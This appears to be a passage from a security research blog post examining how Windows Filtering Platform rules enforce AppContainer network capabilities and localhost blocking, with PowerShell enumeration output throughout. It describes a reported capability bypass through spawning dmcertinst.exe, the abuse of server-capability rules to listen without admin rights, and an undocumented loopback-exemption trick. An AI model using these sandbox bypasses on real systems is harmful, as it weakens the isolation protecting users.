The Sorted parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try and work out what would be the matched filter based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

65

PS> Add-FwCondition $template -ProcessId $pid

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80

PS> Add-FwCondition $template -ProtocolType Tcp

PS> Add-FwCondition $template -ConditionFlags 0

PS> $template.Conditions

FieldKeyName                     MatchType Value                                                                    

------------                     --------- -----                                                                    

FWPM_CONDITION_ALE_APP_ID        Equal     \device\harddisk...

FWPM_CONDITION_ALE_USER_ID       Equal     FirewallTokenInformation                        

FWPM_CONDITION_ALE_PACKAGE_ID    Equal     S-1-0-0

FWPM_CONDITION_IP_REMOTE_ADDRESS Equal     142.250.72.196

FWPM_CONDITION_IP_REMOTE_PORT    Equal     80

FWPM_CONDITION_IP_PROTOCOL       Equal     Tcp

FWPM_CONDITION_FLAGS             Equal     None

PS> $fs = Get-FwFilter -Template $template

PS> $fs.Count

2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplate command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilter command returns 65 results (on my machine).

Next we add some metadata, first from the current powershell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.com on port 80. Finally we add some condition flags, we'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filter we see the following:

PS> $fs | Format-FwFilter

Name       : Default Outbound

Action Type: Permit

Key        : 07ba2a96-0364-4759-966d-155007bde926

Id         : 67989

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 9223372036854783936

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public    

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

Name       : Default Outbound

Action Type: Permit

Key        : 36da9a47-b57d-434e-9345-0e36809e3f6a

Id         : 67993

Description: Default Outbound

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : None

Weight     : 3458764513820540928

Both of the two filters permit the connection and based on the name they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEvent command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions

PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $ev_temp | Format-List

FilterId        : 67989

LayerId         : 48

ReauthReason    : 0

OriginalProfile : Public

CurrentProfile  : Public

MsFwpDirection  : 0

IsLoopback      : False

Type            : ClassifyAllow

Flags           : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...

Timestamp       : 8/5/2021 11:24:41 AM

IPProtocol      : Tcp

LocalEndpoint   : 10.0.0.101:63046

RemoteEndpoint  : 142.250.72.196:80

ScopeId         : 0

AppId           : \device\harddiskvolume3\windows\system32\wind...

UserId          : S-1-5-21-4266194842-3460360287-487498758-1103

AddressFamily   : Inet

PackageSid      : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplate command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially if you compare the FilterId value to the Id fields in the two enumerated filters we match the first filter. This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

Worth noting at this point that because the network event buffer can be small, of the order of 30-40 events depending on load, it's possible on a busy server that events might be lost before you query for them. You can get a real-time trace of events by using the Start-FwNetEventListener command to avoid losing events.

Callout Drivers

As mentioned a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various different products, ranging from AV to scan your network traffic for badness to NMAP's NPCAP capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register its callback functions for the callout using the FwpmCalloutRegister API in the kernel driver. Second they need to create a filter to use the callout by specifying the providerContextKey GUID and one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0 API in user-mode. I expose this API through the Get-FwCallout command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName

CalloutId KeyName

--------- -------

        1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4

        2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6

        3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4

        4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6

        5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4

        6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6

...

The above output shows the callouts listed by their callout ID numbers. The ID number is key to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This article shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article then just calculate the offset based on a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID, the magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)

If you're in kernel mode there's an undocumented KfdGetRefCallout function (and a corresponding KfdDeRefCallout to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox is documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilities enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the ‚ÄúYour Internet Connection‚ÄĚ capability is granted.

However, this shouldn't grant the ability to act as a network server, for that you need the internetClientServer capability. Note that Windows defaults to blocking incoming connections, so just because you have the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServer which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear, hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST

PS> $addr = Resolve-DnsName "www.google.com" -Type A

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyDrop

PS> Get-FwNetEvent -Template $template | Format-List

FilterId               : 71079

LayerId                : 48

ReauthReason           : 0

...

PS> Get-FwFilter -Id 71079 | Format-FwFilter

Name       : Block Outbound Default Rule

Action Type: Block

Key        : fb8f5cab-1a15-4616-b63f-4a0d89e527f8

Id         : 71079

Description: Block Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 274877906944

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID NotEqual  NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token so we're expecting the network connection should fail. Next we connect a TcpClient socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the ‚ÄúBlock Outbound Default Rule‚ÄĚ. This will block any AppContainer network connection, based on the FWPM_CONDITION_ALE_PACKAGE_ID¬†condition which hasn't been permitted by higher priority firewall filters.

Like with the ‚ÄúDefault Outbound‚ÄĚ filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For ‚ÄúBlock Outbound Default Rule‚ÄĚ it's MICROSOFT_DEFENDER_SUBLAYER_WSH¬†which is used for built-in filters which aren't directly visible from the Defender firewall configuration. Whereas MICROSOFT_DEFENDER_SUBLAYER_FIREWALL¬†is used for ‚ÄúDefault Outbound‚ÄĚ, which is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter which permits the connection within the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClient capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient

PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow

PS> $sock = Invoke-NtToken $token {

>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)

>> }

PS> Set-FwEngineOption -NetEventMatchAnyKeywords None

PS> $template = New-FwNetEventTemplate

PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80

PS> Add-FwCondition $template -NetEventType ClassifyAllow

PS> Get-FwNetEvent -Template $template | Format-List

FilterId        : 71075

LayerId         : 48

ReauthReason    : 0

...

PS> Get-FwFilter -Id 71075 | Format-FwFilter

Name       : InternetClient Default Rule

Action Type: Permit

Key        : 406568a7-a949-410d-adbb-2642ec3e8653

Id         : 71075

Description: InternetClient Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 412316868544

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with internetClient capability. When we connect the socket we now no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the ‚ÄúInternetClient Default Rule‚ÄĚ filter matched the connection.

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer based on the FWPM_CONDITION_ALE_PACKAGE_ID condition. The FWPM_CONDITION_ALE_USER_ID also ensures that it will only match if the creator has the internetCapability capability which is S-1-15-3-1 in the SDDL format. This filter is what's granting access to the network.

One odd thing is in the FWPM_CONDITION_IP_REMOTE_ADDRESS¬†condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local ‚Äúprivate‚ÄĚ network? At the very least you'd assume this would block the reserved IP address ranges from RFC1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured to the public profile as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address including your local ‚Äúprivate‚ÄĚ network. This might be unexpected. In fact if you enumerate all the filters on the machine you won't find any filter to match the privateNetworkClientServer capability and using the capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there's now three ‚ÄúInternetClient Default Rule‚ÄĚ filters (note on Windows 11 there will only be one as it uses the OR'ing feature of conditions as mentioned above to merge the three rules together).

Name       : InternetClient Default Rule

Action Type: Permit

...

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 10.0.0.0

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

...

Name       : InternetClient Default Rule

Action Type: Permit

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 239.255.255.255 High: 255.255.255.255

...

Name       : InternetClient Default Rule

Action Type: Permit

...

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.255.255.255 High: 224.0.0.0

...

As you can see in the first filter, it covers addresses 0.0.0.0 to 10.0.0.0. The machine's private network is 10.0.0.0/8. The profile IDs are also now set to Private. The other two exclude the entire 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 240.0.0.0.

The profile ID conditions are important here if you have more than one network interface. For example if you have two, one Public and one Private, you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface preventing the application without the right capability from accessing the private network.

Speaking of which, we can also now identify the filter which will match the private network capability. There's two, to cover the private network range and the multicast range. We'll just show one of them.

Name       : PrivateNetwork Outbound Default Rule

Action Type: Permit

Key        : e0194c63-c9e4-42a5-bbd4-06d90532d5e6

Id         : 71640

Description: PrivateNetwork Outbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 36029209335832512

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 10.0.0.0 High: 10.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_ID condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably recommended even if you're on your own private network (Windows 11 even makes the recommendation explicit as shown below) in that it should reduce the exposed attack surface of the device from others on the network. However if an AppContainer application with the internetClient capability could be compromised it opens up your private network to access where the Private profile wouldn't.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which typically is always running. This service is what usually makes DNS requests on behalf of applications as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course if the service is disabled in-process DNS lookups will start to be used, which could result in weird name resolving issues depending on your network configuration.

We can now understand how issue 2207¬†I reported to Microsoft bypasses the capability requirements. If in the MICROSOFT_DEFENDER_SUBLAYER_WSH¬†sublayer for an outbound connection there are Permit¬†filters which are evaluated before the ‚ÄúBlock Outbound Default Rule‚ÄĚ filter then it might be possible to avoid needing capabilities.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |

Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |

Select-Object ActionType, Name

...

Permit     Allow outbound TCP traffic from dmcertinst.exe

Permit     Allow outbound TCP traffic from omadmclient.exe

Permit     Allow outbound TCP traffic from deviceenroller.exe

Permit     InternetClient Default Rule

Permit     InternetClientServer Outbound Default Rule

Block      Block all outbound traffic from SearchFilterHost

Block      Block outbound traffic from dmcertinst.exe

Block      Block outbound traffic from omadmclient.exe

Block      Block outbound traffic from deviceenroller.exe

Block      Block Outbound Default Rule

Block      WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter

Name       : Allow outbound TCP traffic from dmcertinst.exe

Action Type: Permit

Key        : 5237f74f-6346-4038-a48d-4b779f862e65

Id         : 72753

Description:

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : Indexed

Weight     : 422487342972928

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_APP_ID  Equal    

\device\harddiskvolume3\windows\system32\dmcertinst.exe

FWPM_CONDITION_IP_PROTOCOL Equal     Tcp

As we can see in the output there are quite a few Permit filters before the ‚ÄúBlock Outbound Default Rule‚ÄĚ filter, and of course I've also cropped the list to make it smaller. If we inspect the ‚ÄúAllow outbound TCP traffic from dmcertinst.exe‚ÄĚ filter we find that it only matches on the App ID and the IP protocol. As it doesn't have an AppContainer specific checks, then any sockets created in the context of a dmcertinst¬†process would be permitted to make TCP connections.

Once the ‚ÄúAllow outbound TCP traffic from dmcertinst.exe‚ÄĚ filter matches the sublayer evaluation is terminated and it never reaches the ‚ÄúBlock Outbound Default Rule‚ÄĚ filter. This is fairly trivial to exploit, as long as the AppContainer process is allowed to spawn new processes, which is allowed by default.

Server Capabilities

What about the internetClientServer capability, how does that function? First, there's a second set of outbound filters to cover the capability with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_ID condition checks for the internetClientServer (S-1-15-3-2) capability instead. For inbound connections the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match InternetClientServer |

Format-FwFilter

Name       : InternetClientServer Inbound Default Rule

Action Type: Permit

Key        : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257

Id         : 72470

Description: InternetClientServer Inbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 824633728960

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has internetClientServer capability. Note, there would be similar rules for the private network if the network interface is marked as Private but only granting access with the privateNetworkClientServer capability.

As mentioned earlier just because an application has one of these capabilities doesn't mean it can receive network connections. The default configuration will block the inbound connection.  However, when an UWP application is installed and requires one of the two server capabilities, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : @{Microsoft.Windows.Photos_2021...

Action Type: Permit

Key        : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea

Id         : 68299

Description: @{Microsoft.Windows.Photos_2021...

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : Indexed

Weight     : 10376294366095343616

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Equal    

microsoft.windows.photos_8wekyb3d8bbwe

FWPM_CONDITION_ALE_USER_ID    Equal     O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...

<Owner> (Defaulted) : NT AUTHORITY\SYSTEM

<Group> (Defaulted) : NT AUTHORITY\SYSTEM

<DACL>

DOMAIN\alice: (Allowed)(None)(Full Access)

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection,...

APPLICATION PACKAGE AUTHORITY\Your home or work networks:...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note this rule doesn't do any checking on the executable file, remote IP address, port or profile ID. Once an installed AppContainer application is granted a server capability it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without needing the administrator access normally required to grant the executable access. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or the privateNetworkClientServer capabilities. If there isn't an application installed which has the appropriate firewall rules a non-administrator user can install any signed application with the appropriate capabilities to add the firewall rules. While this clearly circumvents the expected administrator requirements for new listening processes it's presumably by design.

Localhost Access

One of the specific restrictions imposed on AppContainer applications is blocking access to localhost. The purpose of this is it makes it more difficult to exploit local network services which might not correctly handle AppContainer callers creating a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"

PS> Invoke-NtToken $token {

    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)

}

Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because

connected host has failed to respond 127.0.0.1:445"

If you compare the error to when we tried to connect to an internet address without the appropriate capability you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. However, for localhost we instead get a timeout error, which is preceded by multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: Block

Key        : a58394b7-379c-43ac-aa07-9b620559955e

Id         : 69039

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551614

Conditions :

FieldKeyName               MatchType   Value

------------               ---------   -----

FWPM_CONDITION_FLAGS       FlagsAllSet IsLoopback

FWPM_CONDITION_ALE_USER_ID Equal      

O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...

<Owner> : NT AUTHORITY\LOCAL SERVICE

<DACL>

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...

APPLICATION PACKAGE AUTHORITY\Your Internet connection...

APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...

APPLICATION PACKAGE AUTHORITY\Your home or work networks...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)

Everyone: (Allowed)(None)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect, instead it's in the receive/accept layer. This explains why we get a timeout rather than immediate failure: the ‚Äúinbound‚ÄĚ connection request is being dropped as per the default configuration. This means the TCP client waits for the response from the server, until it eventually hits the timeout limit.

The second interesting thing to note about the filter is it's not based on an IP address such as 127.0.0.1. Instead it's using a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACK in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches either AppContainer or non-AppContainer processes. This is of course the point, if it didn't match both then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group.  This condition was modified for supporting LPAC over Windows 8, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection?  Unsurprisingly there are some additional permit filters before the blocking filter as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match AppContainerLoopback | Format-FwFilter

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name       : AppContainerLoopback

Action Type: Permit

...

Conditions :

FieldKeyName         MatchType   Value

------------         ---------   -----

FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to use loopback to any other. However, based on testing this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets timeout rather than fail immediately.

The final flag, IsReserved¬†is more curious. MSDN of course says this is ‚ÄúReserved for future use.‚ÄĚ, and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved it wasn't for very long. The obvious conclusion is this flag is really a ‚ÄúMicrosoft Reserved‚ÄĚ flag, by that I mean it's actually used but Microsoft is yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to only being used for debugging purposes. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debug purposes through an administrator only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"

PS> Get-FwFilter -AleLayer ConnectV4 |

Where-Object Name -Match AppContainerLoopback |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : AppContainerLoopback

Action Type: CalloutInspection

Key        : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0

Id         : 54912247

Description: AppContainerLoopback

Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 18446744073709551615

Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4

Conditions :

FieldKeyName               MatchType Value

------------               --------- -----

FWPM_CONDITION_ALE_USER_ID Equal     D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...

<DACL>

Everyone: (Allowed)(NoPropagateInherit)(Match)

NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)

PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACK package name. We then look for the AppContainerLoopback filters in the connect layer. The one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising, you would expect it'd do something more than inspecting the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4 gives the game away. The fact that it has RESERVED in the name can't be a coincidence. This callout is one implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassify function. This name now loses all mystery and pretty much explains what its purpose is, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last ‚ÄúLOOPBACK‚ÄĚ line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is ‚ÄúPACKAGE CAPABILITY\LOOPBACK‚Ä̬†which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost which isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network facing sandboxed process and would work from Windows 8 through 11. . Unfortunately it's not officially documented so can't be relied upon. An example demonstrating the use of the capability is shown below.

